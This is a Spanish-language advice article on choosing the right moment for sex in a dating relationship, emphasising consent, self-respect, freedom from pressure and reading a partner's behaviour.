Tener un novio o novia es esencial para el afianzamiento de la autoestima en cada persona, crea valores de compromiso, amabilidad, confianza, desprendimiento y respeto por la condición de otro, a esto se le suma la fortaleza que se adquiere y sobre todo la templanza para enfrentar problemas en un futuro próximo al que se pueden ver enfrentados. En todo esto hay un momento en el cual, en el noviazgo, ambos se sienten preparados para ver el sexo como un motivo más de unión y es importante saber ciertas cosas.

El momento:

No podemos decirte que el mejor momento para tener una relación sexual con tu novio sea al cabo de cierto tiempo de haberse conocido, no. Cuando hablamos de momento, nos referimos esencialmente a la búsqueda de ese espacio donde ambos estén confiado y completamente seguros de que quieren explorar sus cuerpos mediante el sexo. Es cierto que sería bueno pasar por una etapa de conocimiento, donde la sexualidad no sea el tema principal: valores, gustos, disgustos y todo aquello que hace grande a una relación, pero hoy por hoy esos tiempos se ven reducidos por la prisa de mantener una relación sexual, asi que es mejor que te detengas un momento y razones un par de argumentos:

Es tu cuerpo:

No hay nada más sagrado que tu cuerpo, es un templo que tú has alimentado día tras día, que has protegido de todo tipo de circunstancias, el que te provee de fuerzas cada día para levantarte y ser feliz, así que el hecho de tener una relación sexual debe conllevar un análisis de tu pareja: “¿me tratará con cuidado?”, “¿se aprovechará de su situación?”, “¿será violento?”, “¿cuidará de mí?”, “¿respetará mi dignidad?”, si una o más preguntas fueron respondidas de forma positiva, es mejor que te abstengas, pues si hay algo más importante que el sexo y es tu dignidad y autoestima como persona, y eso debe prevalecer por sobre cualquier cosa y deberá ser respetado sin “peros”.

¿Estás cómodo?:

Esto va muy relacionado con no dejarte presionar. Solo, escúchalo bien, solo cuando estés verdaderamente listo o lista puedes hacerlo. Y te estarás preguntando: ¿Cómo sé si estoy preparado?, es una pregunta cuya respuesta es relativa ya que eres tu quien se conoce, quien sabe de sus temores y las experiencias con las parejas anteriores, más sin embargo puedes estar listo cuando sabes que hay algo fuerte que te enlaza con esa persona, un vínculo que va más allá de lo afectivo y que tiene nombre propio: seguridad. Si sabes que te respeta, que se detendrá si sientes que algo no va bien y que te dará el tiempo necesario para acostumbrarte, entonces puede que sea el momento.

Los nervios son normales, sea la primera o la undécima vez que tienes relaciones sexuales, pero hay dos tipos de nerviosismo: el provocado por la situación en sí: el autocritico; y el otro que es cuando sientes que tu cuerpo no quiere recibir a nadie más por un tiempo: donde te sientes violentado, si es el segundo, declina inmediatamente de la posibilidad.

Aprovecha la sexualidad como método de evaluación, ¿Cómo?, de acuerdo al comportamiento de tu novio o novia, antes durante y después del acto sexual, sacarás muchas conclusiones sobre su actitud, personalidad y sobre todo, lo que te espera a su lado.